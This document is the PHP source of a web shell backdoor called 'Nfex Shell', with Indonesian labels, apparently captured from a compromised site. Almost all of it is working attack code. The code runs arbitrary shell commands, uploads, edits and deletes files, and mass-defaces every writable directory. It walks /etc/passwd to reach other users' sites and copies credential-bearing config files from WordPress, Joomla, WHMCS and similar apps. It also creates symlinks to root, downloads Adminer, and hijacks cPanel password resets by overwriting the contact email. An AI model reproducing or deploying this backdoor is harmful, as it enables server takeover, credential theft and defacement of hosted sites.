Nfex Shell

Copyright © Nfex
".$perm.""; } else { return "".$perm.""; } } function r($dir,$perm) { if(!is_readable($dir)) { return "".$perm.""; } else { return "".$perm.""; } } function exe($cmd) { if(function_exists('system')) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('exec')) { @exec($cmd,$results); $buff = ""; foreach($results as $result) { $buff .= $result; } return $buff; } elseif(function_exists('passthru')) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('shell_exec')) { $buff = @shell_exec($cmd); return $buff; } } function perms($file){ $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { // Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } if(isset($_GET['path'])){ $path = $_GET['path']; chdir($path); }else{ $path = getcwd(); } $path = str_replace('\\','/',$path); $paths = explode('/',$path); if(isset($_GET['dir'])) { $dir = $_GET['dir']; chdir($dir); } else { $dir = getcwd(); } $kernel = php_uname(); $ip = getHostByName(getHostName()); $ver = phpversion(); $dom = $_SERVER['HTTP_HOST']; $dir = str_replace("\\","/",$dir); $scdir = explode("/", $dir); $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "On" : "Off"; $ds = @ini_get("disable_functions"); $mysql = (function_exists('mysql_connect')) ? "On" : "Off"; $curl = (function_exists('curl_version')) ? "On" : "Off"; $wget = (exe('wget --help')) ? "On" : "Off"; $perl = (exe('perl --help')) ? "On" : "Off"; $python = (exe('python --help')) ? "On" : "Off"; $show_ds = (!empty($ds)) ? "$ds" : "NONE"; $total = formatSize(disk_total_space($path)); $free = formatSize(disk_free_space($path)); $total1 = disk_total_space($path); $free1 = disk_free_space($path); $used = formatSize($total1 - $free1); function formatSize( $bytes ) { $types = array( 'B', 'KB', 'MB', 'GB', 'TB' ); for( $i = 0; $bytes >= 1024 && $i < ( count( $types ) -1 ); $bytes /= 1024, $i++ ); return( round( $bytes, 2 ) . " " . $types[$i] ); } function ambilKata($param, $kata1, $kata2){ if(strpos($param, $kata1) === FALSE) return FALSE; if(strpos($param, $kata2) === FALSE) return FALSE; $start = strpos($param, $kata1) + strlen($kata1); $end = strpos($param, $kata2, $start); $return = substr($param, $start, $end - $start); return $return; } echo " Nfex Backdoor

[ ! ] Nfex Backdoor [ ! ]

Keep Fighting, Even Though It's All Impossible

"; //keluar if (isset($_GET['keluar'])) { session_start(); session_destroy(); echo ''; } // Info Server if($_GET['aksi'] == 'InfoServer'){ echo '

Informasi Server

  • Nama Server : '.$_SERVER["SERVER_NAME"].'
  • Ip Address : '.$_SERVER["SERVER_ADDR"].'
  • Port : '.$_SERVER["SERVER_PORT"].'
  • HDD : '.$used.' / '.$total.' ( Free: '.$free.' )
  • Protokol : '.$_SERVER["SERVER_PROTOCOL"].'
  • Save Data : '.$_SERVER["HTTP_SAVE_DATA"].'
  • Save Mode : '.$sm.'
  • Fungsi Nonaktif : '.$show_ds.'
  • Koneksi : '.$_SERVER["HTTP_CONNECTION"].'
  • Software : '.$_SERVER["SERVER_SOFTWARE"].'
  • Dokumen Root : '.$_SERVER["DOCUMENT_ROOT"].'
  • G-Interface : '.$_SERVER["GATEWAY_INTERFACE"].'
  • R-Method : '.$_SERVER["REQUEST_METHOD"].'
  • Mysql : '.$mysql.'
  • Perl : '.$perl.'
  • Wget : '.$wget.'
  • Curl : '.$curl.'
  • Sistem Server : '.$kernel.'
  • Your IP: '.$_SERVER["REMOTE_ADDR"].'
  • Your Browser : '.$_SERVER["HTTP_USER_AGENT"].'
    • '; } //upload if ($_GET['aksi'] == 'upload') { echo "

    "; if(isset($_FILES['file'])){ if(@copy($_FILES['file']['tmp_name'],$dir.'/'.$_FILES['file']['name'])){ echo ''; }else{ echo ''; } } } //openfile if (isset($_GET['dirf'])) { $file = $_GET['dirf']; } //buat_file if ($_GET['aksi'] == 'buat_file') { $output = "

    "; echo $output; if (isset($_POST['bikin'])) { $nama_file = $_POST['nama_file']; $isi_file = $_POST['isi_file']; $handle = fopen("$nama_file", "w"); if (fwrite($handle, $isi_file)) { echo ''; }else{ echo ''; } } } /* View */ if($_GET['aksi'] == 'view') { echo '
    [ Lihat ] [ Edit ] [ Delete ]
    '; echo "

    "; } /* Edit */ if($_GET['aksi'] == 'edit') { $nama = basename($file); echo '
    [ Lihat ] [ Ubah Nama ] [ Delete ]
    '; echo "

    $nama


    "; if(isset($_POST['edit_file'])) { $updt = fopen("$file", "w"); $hasil = fwrite($updt, $_POST['isi']); if ($hasil) { echo ''; }else{ echo ''; } } } /* Ubah Nama */ if($_GET['aksi'] == 'rename') { $nama = basename($file); echo '
    [ Kembali ]
    '; echo "

    $nama




    "; if(isset($_POST['rename_file'])) { $lama = $file; $baru = $_POST['namanew']; rename( $baru, $lama); if(file_exists($baru)) { echo ''; }else{ if(rename( $lama, $baru)) { echo ''; }else{ echo ''; } } } } /* Delete File */ if ($_GET['aksi'] == 'hapusf') { $nama = basename($file); echo '
    [ Lihat ] [ Edit ] [ Ubah Nama ]
    '; $output ="

    Yakin Ingin Menghapus File : $nama


    Tidak

    "; echo $output; if ($_POST['ya']) { $hapus = unlink($file); if ($hapus) { echo ''; }else{ echo ''; } } } /* Add Folder */ if ($_GET['aksi'] == 'buat_folder' ) { $output = "

    "; echo $output; if (isset($_POST['buat'])) { $nama_folder = $_POST['nama_folder']; $folder = preg_replace("([^\w\s\d\-_~,;:\[\]\(\].]|[\.]{2,})", '', $_POST["nama_folder"]); $fd = mkdir ($folder); if ($fd) { echo ''; }else{ echo "echo '"; } } } /* Delete Folder */ if ($_GET['aksi'] == 'hapus_folder' ) { $nama = basename(getcwd()); $output ="
    [ Ubah Nama ] [ Delete ]

    Yakin Ingin Menghapus Folder : $nama ?


    Tidak

    "; echo $output; if ($_POST['ya']) { if(is_dir($dir)) { if(is_writable($dir)) { @rmdir($dir); @exe("rm -rf $dir"); @exe("rmdir /s /q $dir"); echo ""; } else { echo ""; } } } exit; } /* Ubah Nama Folder */ if ($_GET['aksi'] == 'rename_folder' ) { $nama = basename(getcwd()); $output="
    [ Delete ]

    Nama Folder => $nama



    "; echo $output; if (isset($_POST['ganti'])) { $lama = $dir; $baru = $_POST['namanew']; $ubah = rename($lama, $baru); if($ubah) { echo ""; }else{ echo "" ; } } exit; } /* mass delete */ if($_GET['aksi'] == 'MassDellete') { function hapus_massal($dir,$namafile) { if(is_writable($dir)) { $dira = scandir($dir); foreach($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if($dirb === '.') { if(file_exists("$dir/$namafile")) { unlink("$dir/$namafile"); } } elseif($dirb === '..') { if(file_exists("".dirname($dir)."/$namafile")) { unlink("".dirname($dir)."/$namafile"); } } else { if(is_dir($dirc)) { if(is_writable($dirc)) { if($lokasi) { echo "$lokasi > Terhapus\n"; unlink($lokasi); $massdel = hapus_massal($dirc,$namafile); } } } } } } } if($_POST['start']) { echo "Kembali"; } else { echo "

    Lokasi


    Nama File


    "; } exit; } /* Mass Deface */ if($_GET['aksi'] == 'MassDeface') { function tipe_massal($dir,$namafile,$isi_script) { if(is_writable($dir)) { $dira = scandir($dir); foreach($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if($dirb === '.') { file_put_contents($lokasi, $isi_script); } elseif($dirb === '..') { file_put_contents($lokasi, $isi_script); } else { if(is_dir($dirc)) { if(is_writable($dirc)) { echo "Berhasil => $lokasi\n"; file_put_contents($lokasi, $isi_script); $MassDeface = tipe_massal($dirc,$namafile,$isi_script); } } } } } } function tipe_biasa($dir,$namafile,$isi_script) { if(is_writable($dir)) { $dira = scandir($dir); foreach($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if($dirb === '.') { file_put_contents($lokasi, $isi_script); } elseif($dirb === '..') { file_put_contents($lokasi, $isi_script); } else { if(is_dir($dirc)) { if(is_writable($dirc)) { echo "Berhasil => $dirb/$namafile\n"; file_put_contents($lokasi, $isi_script); } } } } } } if($_POST['start']) { echo "Kembali"; } else { echo "

    { Type Mass Deface }

    Lokasi


    Nama File


    Isi File



    "; } exit; } /* Jumping */ if($_GET['aksi'] == 'jumping') { $i = 0; echo "
    "; if(preg_match("/hsphere/", $dir)) { $urls = explode("\r\n", $_POST['url']); if(isset($_POST['jump'])) { echo "
    ";
				foreach($urls as $url) {
					$url = str_replace(array("http://","www."), "", strtolower($url));
					$etc = "/etc/passwd";
					$f = fopen($etc,"r");
					while($gets = fgets($f)) {
						$pecah = explode(":", $gets);
						$user = $pecah[0];
						$dir_user = "/hsphere/local/home/$user";
						if(is_dir($dir_user) === true) {
							$url_user = $dir_user."/".$url;
							if(is_readable($url_user)) {
								$i++;
								$jrw = "[R] $url_user";
								if(is_writable($url_user)) {
									$jrw = "[RW] $url_user";
								}
								echo $jrw."
    ";
							}
						}
					}
				}
			if($i == 0) { 
			} else {
				echo "
    Total ada ".$i." di ".$ip;
			}
			echo "
    "; } else { echo '
    List Domains:

    '; } } elseif(preg_match("/vhosts/", $dir)) { $urls = explode("\r\n", $_POST['url']); if(isset($_POST['jump'])) { echo "
    ";
				foreach($urls as $url) {
					$web_vh = "/var/www/vhosts/$url/httpdocs";
					if(is_dir($web_vh) === true) {
						if(is_readable($web_vh)) {
							$i++;
							$jrw = "[R] $web_vh";
							if(is_writable($web_vh)) {
								$jrw = "[RW] $web_vh";
							}
							echo $jrw."
    ";
						}
					}
				}
			if($i == 0) { 
			} else {
				echo "
    Total ada ".$i." Kamar di ".$ip;
			}
			echo "
    "; } else { echo '
    List Domains:

    '; } } else { echo "
    ";
			$etc = fopen("/etc/passwd", "r") or die("Can't read /etc/passwd
    ");
			while($passwd = fgets($etc)) {
				if($passwd == '' || !$etc) {
					echo "Can't read /etc/passwd
    ";
				} else {
					preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
					foreach($user_jumping[1] as $user_pro_jump) {
						$user_jumping_dir = "/home/$user_pro_jump/public_html";
						if(is_readable($user_jumping_dir)) {
							$i++;
							$jrw = "[R] $user_jumping_dir";
							if(is_writable($user_jumping_dir)) {
								$jrw = "[RW] $user_jumping_dir";
							}
							echo $jrw;
							if(function_exists('posix_getpwuid')) {
								$domain_jump = file_get_contents("/etc/named.conf");
								if($domain_jump == '') {
									echo " => ( gabisa ambil nama domain nya )
    ";
								} else {
									preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
									foreach($domains_jump[1] as $dj) {
										$user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
										$user_jumping_url = $user_jumping_url['name'];
										if($user_jumping_url == $user_pro_jump) {
											echo " => ( $dj )
    ";
											break;
										}
									}
								}
							} else {
								echo "
    ";
							}
						}
					}
				}
			}
			if($i == 0) { 
			} else {
				echo "
    Total ada ".$i." Kamar di ".$ip;
			}
			echo "
    "; } echo "
    "; } /* Config */ if($_GET['aksi'] == 'config') { $etc = fopen("/etc/passwd", "r") or die("
    Can't read /etc/passwd
    "); $con = mkdir("codexploit_configs", 0777); $isi_htc = "Options all\nRequire None\nSatisfy Any"; $htc = fopen("codexploit_configs/.htaccess","w"); fwrite($htc, $isi_htc); while($passwd = fgets($etc)) { if($passwd == "" || !$etc) { echo "Can't read /etc/passwd"; } else { preg_match_all('/(.*?):x:/', $passwd, $user_config); foreach($user_config[1] as $user_con) { $user_config_dir = "/home/$user_con/public_html/"; if(is_readable($user_config_dir)) { $grab_config = [ "/home/$user_con/.my.cnf" => "cpanel", "/home/$user_con/public_html/config/koneksi.php" => "Lokomedia", "/home/$user_con/public_html/forum/config.php" => "phpBB", "/home/$user_con/public_html/sites/default/settings.php" => "Drupal", "/home/$user_con/public_html/config/settings.inc.php" => "PrestaShop", "/home/$user_con/public_html/app/etc/local.xml" => "Magento", "/home/$user_con/public_html/admin/config.php" => "OpenCart", "/home/$user_con/public_html/application/config/database.php" => "Ellislab", "/home/$user_con/public_html/vb/includes/config.php" => "Vbulletin", "/home/$user_con/public_html/includes/config.php" => "Vbulletin", "/home/$user_con/public_html/forum/includes/config.php" => "Vbulletin", "/home/$user_con/public_html/forums/includes/config.php" => "Vbulletin", "/home/$user_con/public_html/cc/includes/config.php" => "Vbulletin", "/home/$user_con/public_html/inc/config.php" => "MyBB", "/home/$user_con/public_html/includes/configure.php" => "OsCommerce", "/home/$user_con/public_html/shop/includes/configure.php" => "OsCommerce", "/home/$user_con/public_html/os/includes/configure.php" => "OsCommerce", "/home/$user_con/public_html/oscom/includes/configure.php" => "OsCommerce", "/home/$user_con/public_html/products/includes/configure.php" => "OsCommerce", "/home/$user_con/public_html/cart/includes/configure.php" => "OsCommerce", "/home/$user_con/public_html/inc/conf_global.php" => "IPB", "/home/$user_con/public_html/wp-config.php" => "Wordpress", "/home/$user_con/public_html/wp/test/wp-config.php" => "Wordpress", "/home/$user_con/public_html/blog/wp-config.php" => "Wordpress", "/home/$user_con/public_html/beta/wp-config.php" => "Wordpress", "/home/$user_con/public_html/portal/wp-config.php" => "Wordpress", "/home/$user_con/public_html/site/wp-config.php" => "Wordpress", "/home/$user_con/public_html/wp/wp-config.php" => "Wordpress", "/home/$user_con/public_html/WP/wp-config.php" => "Wordpress", "/home/$user_con/public_html/news/wp-config.php" => "Wordpress", "/home/$user_con/public_html/wordpress/wp-config.php" => "Wordpress", "/home/$user_con/public_html/test/wp-config.php" => "Wordpress", "/home/$user_con/public_html/demo/wp-config.php" => "Wordpress", "/home/$user_con/public_html/home/wp-config.php" => "Wordpress", "/home/$user_con/public_html/v1/wp-config.php" => "Wordpress", "/home/$user_con/public_html/v2/wp-config.php" => "Wordpress", "/home/$user_con/public_html/press/wp-config.php" => "Wordpress", "/home/$user_con/public_html/new/wp-config.php" => "Wordpress", "/home/$user_con/public_html/blogs/wp-config.php" => "Wordpress", "/home/$user_con/public_html/configuration.php" => "Joomla", "/home/$user_con/public_html/blog/configuration.php" => "Joomla", "/home/$user_con/public_html/submitticket.php" => "^WHMCS", "/home/$user_con/public_html/cms/configuration.php" => "Joomla", "/home/$user_con/public_html/beta/configuration.php" => "Joomla", "/home/$user_con/public_html/portal/configuration.php" => "Joomla", "/home/$user_con/public_html/site/configuration.php" => "Joomla", "/home/$user_con/public_html/main/configuration.php" => "Joomla", "/home/$user_con/public_html/home/configuration.php" => "Joomla", "/home/$user_con/public_html/demo/configuration.php" => "Joomla", "/home/$user_con/public_html/test/configuration.php" => "Joomla", "/home/$user_con/public_html/v1/configuration.php" => "Joomla", "/home/$user_con/public_html/v2/configuration.php" => "Joomla", "/home/$user_con/public_html/joomla/configuration.php" => "Joomla", "/home/$user_con/public_html/new/configuration.php" => "Joomla", "/home/$user_con/public_html/WHMCS/submitticket.php" => "WHMCS", "/home/$user_con/public_html/whmcs1/submitticket.php" => "WHMCS", "/home/$user_con/public_html/Whmcs/submitticket.php" => "WHMCS", "/home/$user_con/public_html/whmcs/submitticket.php" => "WHMCS", "/home/$user_con/public_html/whmcs/submitticket.php" => "WHMCS", "/home/$user_con/public_html/WHMC/submitticket.php" => "WHMCS", "/home/$user_con/public_html/Whmc/submitticket.php" => "WHMCS", "/home/$user_con/public_html/whmc/submitticket.php" => "WHMCS", "/home/$user_con/public_html/WHM/submitticket.php" => "WHMCS", "/home/$user_con/public_html/Whm/submitticket.php" => "WHMCS", "/home/$user_con/public_html/whm/submitticket.php" => "WHMCS", "/home/$user_con/public_html/HOST/submitticket.php" => "WHMCS", "/home/$user_con/public_html/Host/submitticket.php" => "WHMCS", "/home/$user_con/public_html/host/submitticket.php" => "WHMCS", "/home/$user_con/public_html/SUPPORTES/submitticket.php" => "WHMCS", "/home/$user_con/public_html/Supportes/submitticket.php" => "WHMCS", "/home/$user_con/public_html/supportes/submitticket.php" => "WHMCS", "/home/$user_con/public_html/domains/submitticket.php" => "WHMCS", "/home/$user_con/public_html/domain/submitticket.php" => "WHMCS", "/home/$user_con/public_html/Hosting/submitticket.php" => "WHMCS", "/home/$user_con/public_html/HOSTING/submitticket.php" => "WHMCS", "/home/$user_con/public_html/hosting/submitticket.php" => "WHMCS", "/home/$user_con/public_html/CART/submitticket.php" => "WHMCS", "/home/$user_con/public_html/Cart/submitticket.php" => "WHMCS", "/home/$user_con/public_html/cart/submitticket.php" => "WHMCS", "/home/$user_con/public_html/ORDER/submitticket.php" => "WHMCS", "/home/$user_con/public_html/Order/submitticket.php" => "WHMCS", "/home/$user_con/public_html/order/submitticket.php" => "WHMCS", "/home/$user_con/public_html/CLIENT/submitticket.php" => "WHMCS", "/home/$user_con/public_html/Client/submitticket.php" => "WHMCS", "/home/$user_con/public_html/client/submitticket.php" => "WHMCS", "/home/$user_con/public_html/CLIENTAREA/submitticket.php" => "WHMCS", "/home/$user_con/public_html/Clientarea/submitticket.php" => "WHMCS", "/home/$user_con/public_html/clientarea/submitticket.php" => "WHMCS", "/home/$user_con/public_html/SUPPORT/submitticket.php" => "WHMCS", "/home/$user_con/public_html/Support/submitticket.php" => "WHMCS", "/home/$user_con/public_html/support/submitticket.php" => "WHMCS", "/home/$user_con/public_html/BILLING/submitticket.php" => "WHMCS", "/home/$user_con/public_html/Billing/submitticket.php" => "WHMCS", "/home/$user_con/public_html/billing/submitticket.php" => "WHMCS", "/home/$user_con/public_html/BUY/submitticket.php" => "WHMCS", "/home/$user_con/public_html/Buy/submitticket.php" => "WHMCS", "/home/$user_con/public_html/buy/submitticket.php" => "WHMCS", "/home/$user_con/public_html/MANAGE/submitticket.php" => "WHMCS", "/home/$user_con/public_html/Manage/submitticket.php" => "WHMCS", "/home/$user_con/public_html/manage/submitticket.php" => "WHMCS", "/home/$user_con/public_html/CLIENTSUPPORT/submitticket.php" => "WHMCS", "/home/$user_con/public_html/ClientSupport/submitticket.php" => "WHMCS", "/home/$user_con/public_html/Clientsupport/submitticket.php" => "WHMCS", "/home/$user_con/public_html/clientsupport/submitticket.php" => "WHMCS", "/home/$user_con/public_html/CHECKOUT/submitticket.php" => "WHMCS", "/home/$user_con/public_html/Checkout/submitticket.php" => "WHMCS", "/home/$user_con/public_html/checkout/submitticket.php" => "WHMCS", "/home/$user_con/public_html/BILLINGS/submitticket.php" => "WHMCS", "/home/$user_con/public_html/Billings/submitticket.php" => "WHMCS", "/home/$user_con/public_html/billings/submitticket.php" => "WHMCS", "/home/$user_con/public_html/BASKET/submitticket.php" => "WHMCS", "/home/$user_con/public_html/Basket/submitticket.php" => "WHMCS", "/home/$user_con/public_html/basket/submitticket.php" => "WHMCS", "/home/$user_con/public_html/SECURE/submitticket.php" => "WHMCS", "/home/$user_con/public_html/Secure/submitticket.php" => "WHMCS", "/home/$user_con/public_html/secure/submitticket.php" => "WHMCS", "/home/$user_con/public_html/SALES/submitticket.php" => "WHMCS", "/home/$user_con/public_html/Sales/submitticket.php" => "WHMCS", "/home/$user_con/public_html/sales/submitticket.php" => "WHMCS", "/home/$user_con/public_html/BILL/submitticket.php" => "WHMCS", "/home/$user_con/public_html/Bill/submitticket.php" => "WHMCS", "/home/$user_con/public_html/bill/submitticket.php" => "WHMCS", "/home/$user_con/public_html/PURCHASE/submitticket.php" => "WHMCS", "/home/$user_con/public_html/Purchase/submitticket.php" => "WHMCS", "/home/$user_con/public_html/purchase/submitticket.php" => "WHMCS", "/home/$user_con/public_html/ACCOUNT/submitticket.php" => "WHMCS", "/home/$user_con/public_html/Account/submitticket.php" => "WHMCS", "/home/$user_con/public_html/account/submitticket.php" => "WHMCS", "/home/$user_con/public_html/USER/submitticket.php" => "WHMCS", "/home/$user_con/public_html/User/submitticket.php" => "WHMCS", "/home/$user_con/public_html/user/submitticket.php" => "WHMCS", "/home/$user_con/public_html/CLIENTS/submitticket.php" => "WHMCS", "/home/$user_con/public_html/Clients/submitticket.php" => "WHMCS", "/home/$user_con/public_html/clients/submitticket.php" => "WHMCS", "/home/$user_con/public_html/BILLINGS/submitticket.php" => "WHMCS", "/home/$user_con/public_html/Billings/submitticket.php" => "WHMCS", "/home/$user_con/public_html/billings/submitticket.php" => "WHMCS", "/home/$user_con/public_html/MY/submitticket.php" => "WHMCS", "/home/$user_con/public_html/My/submitticket.php" => "WHMCS", "/home/$user_con/public_html/my/submitticket.php" => "WHMCS", "/home/$user_con/public_html/secure/whm/submitticket.php" => "WHMCS", "/home/$user_con/public_html/secure/whmcs/submitticket.php" => "WHMCS", "/home/$user_con/public_html/panel/submitticket.php" => "WHMCS", "/home/$user_con/public_html/clientes/submitticket.php" => "WHMCS", "/home/$user_con/public_html/cliente/submitticket.php" => "WHMCS", "/home/$user_con/public_html/support/order/submitticket.php" => "WHMCS", "/home/$user_con/public_html/bb-config.php" => "BoxBilling", "/home/$user_con/public_html/boxbilling/bb-config.php" => "BoxBilling", "/home/$user_con/public_html/box/bb-config.php" => "BoxBilling", "/home/$user_con/public_html/host/bb-config.php" => "BoxBilling", "/home/$user_con/public_html/Host/bb-config.php" => "BoxBilling", "/home/$user_con/public_html/supportes/bb-config.php" => "BoxBilling", "/home/$user_con/public_html/support/bb-config.php" => "BoxBilling", "/home/$user_con/public_html/hosting/bb-config.php" => "BoxBilling", "/home/$user_con/public_html/cart/bb-config.php" => "BoxBilling", "/home/$user_con/public_html/order/bb-config.php" => "BoxBilling", "/home/$user_con/public_html/client/bb-config.php" => "BoxBilling", "/home/$user_con/public_html/clients/bb-config.php" => "BoxBilling", "/home/$user_con/public_html/cliente/bb-config.php" => "BoxBilling", "/home/$user_con/public_html/clientes/bb-config.php" => "BoxBilling", "/home/$user_con/public_html/billing/bb-config.php" => "BoxBilling", "/home/$user_con/public_html/billings/bb-config.php" => "BoxBilling", "/home/$user_con/public_html/my/bb-config.php" => "BoxBilling", "/home/$user_con/public_html/secure/bb-config.php" => "BoxBilling", "/home/$user_con/public_html/support/order/bb-config.php" => "BoxBilling", "/home/$user_con/public_html/includes/dist-configure.php" => "Zencart", "/home/$user_con/public_html/zencart/includes/dist-configure.php" => "Zencart", "/home/$user_con/public_html/products/includes/dist-configure.php" => "Zencart", "/home/$user_con/public_html/cart/includes/dist-configure.php" => "Zencart", "/home/$user_con/public_html/shop/includes/dist-configure.php" => "Zencart", "/home/$user_con/public_html/includes/iso4217.php" => "Hostbills", "/home/$user_con/public_html/hostbills/includes/iso4217.php" => "Hostbills", "/home/$user_con/public_html/host/includes/iso4217.php" => "Hostbills", "/home/$user_con/public_html/Host/includes/iso4217.php" => "Hostbills", "/home/$user_con/public_html/supportes/includes/iso4217.php" => "Hostbills", "/home/$user_con/public_html/support/includes/iso4217.php" => "Hostbills", "/home/$user_con/public_html/hosting/includes/iso4217.php" => "Hostbills", "/home/$user_con/public_html/cart/includes/iso4217.php" => "Hostbills", "/home/$user_con/public_html/order/includes/iso4217.php" => "Hostbills", "/home/$user_con/public_html/client/includes/iso4217.php" => "Hostbills", "/home/$user_con/public_html/clients/includes/iso4217.php" => "Hostbills", "/home/$user_con/public_html/cliente/includes/iso4217.php" => "Hostbills", "/home/$user_con/public_html/clientes/includes/iso4217.php" => "Hostbills", "/home/$user_con/public_html/billing/includes/iso4217.php" => "Hostbills", "/home/$user_con/public_html/billings/includes/iso4217.php" => "Hostbills", "/home/$user_con/public_html/my/includes/iso4217.php" => "Hostbills", "/home/$user_con/public_html/secure/includes/iso4217.php" => "Hostbills", "/home/$user_con/public_html/support/order/includes/iso4217.php" => "Hostbills" ]; foreach($grab_config as $config => $nama_config) { $ambil_config = file_get_contents($config); if($ambil_config == '') { } else { $file_config = fopen("codexploit_configs/$user_con-$nama_config.txt","w"); fputs($file_config,$ambil_config); } } } } } } echo "
    Done
    "; } /* Adminer */ if($_GET['aksi'] == 'adminer') { $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $path); function adminer($url, $isi) { $fp = fopen($isi, "w"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_BINARYTRANSFER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_FILE, $fp); return curl_exec($ch); curl_close($ch); fclose($fp); ob_flush(); flush(); } if(file_exists('adminer.php')) { echo "
    -> Silahkan Login Adminer <-

    "; } else { if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) { echo "
    -> adminer login <-

    "; } else { echo "
    gagal buat file adminer

    "; } } exit; } /* Symlink */ if($_GET['aksi'] == 'symlink') { if(!is_file('named.txt')){ $d00m = @file("/etc/named.conf"); }else{ $d00m = @file("named.txt"); } if(!$d00m) { die ("
    [ Bypass Read ] [ Symlink 404 ] [ Bypass Symlink ]
    Gagal Membaca /etc/named.conf

    "); } else{ echo "
    [ Bypass Read ] [ Symlink 404 ] [ Bypass Symlink ]
    "; foreach($d00m as $dom){ if(eregi("zone",$dom)){ preg_match_all('#zone "(.*)"#', $dom, $domsws); flush(); if(strlen(trim($domsws[1][0])) > 2){ $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0])); flush(); $site = $user['name'] ; @symlink("/","sym/root"); $site = $domsws[1][0]; $ir = 'ir'; $il = 'il'; if (preg_match("/.^$ir/",$domsws[1][0]) or preg_match("/.^$il/",$domsws[1][0]) ) { $site = ".$domsws[1][0]."; } echo " "; flush(); flush(); } } } echo "
    Domains Users symlink
    ".$site." ".$user['name']." Symlink

    "; } exit; } if($_GET['aksi'] == 'symread') { echo "read /etc/named.conf"; echo "

    "; if(isset($_GET['save'])){ $cont = stripcslashes($_POST['file']); $f = fopen('named.txt','w'); $w = fwrite($f,$cont); if($w){ echo '
    save has been successfully'; } fclose($f); } exit; } if ($_GET['aksi'] == 'sym_404'){ echo '

    Symlink 404

    File Target:
    Save As:
    '; if($_POST['execute']){ rmdir("xploit404"); mkdir("xploit404", 0777); $dir = $_POST['dir']; $isi = $_POST['isi']; system("ln -s ".$dir."xploit404/".$isi); symlink($dir,"xploit404/".$isi); $inija = fopen("xploit404/.htaccess", "w"); fwrite($inija,"ReadmeName ".$isi."\nOptions Indexes FollowSymLinks\nDirectoryIndex ids.html\nAddType text/plain .php\nAddHandler text/plain .php\nSatisfy Any"); echo' >>Sukses<< '; } exit; } if ($_GET['aksi'] == 'sym_bypas'){ if(isset($_GET['save']) and isset($_POST['file']) or @filesize('passwd.txt') > 0){ $cont = stripcslashes($_POST['file']); if(!file_exists('passwd.txt')){ $f = @fopen('passwd.txt','w'); $w = @fwrite($f,$cont); fclose($f); } if($w or @filesize('passwd.txt') > 0){ echo "
    "; flush(); $fil3 = file('passwd.txt'); foreach ($fil3 as $f){ $u=explode(':', $f); $user = $u['0']; echo ""; flush(); flush(); } die ("
    Users symlink FTP
    $user Symlink FTP
    "); } } echo "read /etc/passwd"; echo "


    "; flush(); exit; } if ($_GET['aksi'] == 'CpanelReset') { echo '

    Auto Reset Password Cpanel


    '; if(isset($_POST['submit'])){ $user = get_current_user(); $site = $_SERVER['HTTP_HOST']; $ips = getenv('REMOTE_ADDR'); $email = $_POST['email']; $wr = 'email:'.$email; $f = fopen('/home/'.$user.'/.cpanel/contactinfo', 'w'); fwrite($f, $wr); fclose($f); $f = fopen('/home/'.$user.'/.contactinfo', 'w'); fwrite($f, $wr); fclose($f); $parm = $site.':2082/resetpass?start=1'; echo '
    Url: '.$parm.''; echo '
    Username: '.$user.''; echo '
    Success Reset To: '.$email.'

    '; } exit; } if(isset($_GET['path'])){ $path = $_GET['path']; chdir($path); }else{ $path = getcwd(); } $path = str_replace('\\','/',$path); $paths = explode('/',$path); echo "
    Lokasi Saat Ini => "; foreach($paths as $id=>$pat){ if($pat == '' && $id == 0){ $a = true; echo '/'; continue; } if($pat == '') continue; echo ''.$pat.'/'; } $scandir = scandir($path); echo "
    "; echo '
    '; foreach($scandir as $dir){ /* cek jika ini berbentuk folder */ /* cek jika nama folder karaker terlalu panjang */ if (strlen($dir) > 25) { $_dir = substr($dir, 0, 25)."..."; }else{ $_dir = $dir; } if(!is_dir($path.'/'.$file)) continue; $size = filesize($path.'/'.$file)/1024; $size = round($size,3); if($size >= 1024){ $size = round($size/1024,2).' MB'; }else{ $size = $size.' KB'; } if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue; echo ' '; } foreach($scandir as $file){ if(!is_file($path.'/'.$file)) continue; $size = filesize($path.'/'.$file)/1024; $size = round($size,3); if($size >= 1024){ $size = round($size/1024,2).' MB'; }else{ $size = $size.' KB'; } echo ''; echo ''; } echo '
    Nama Type Size Permission Action
    '.$_dir.' Directory
    '.$size.'
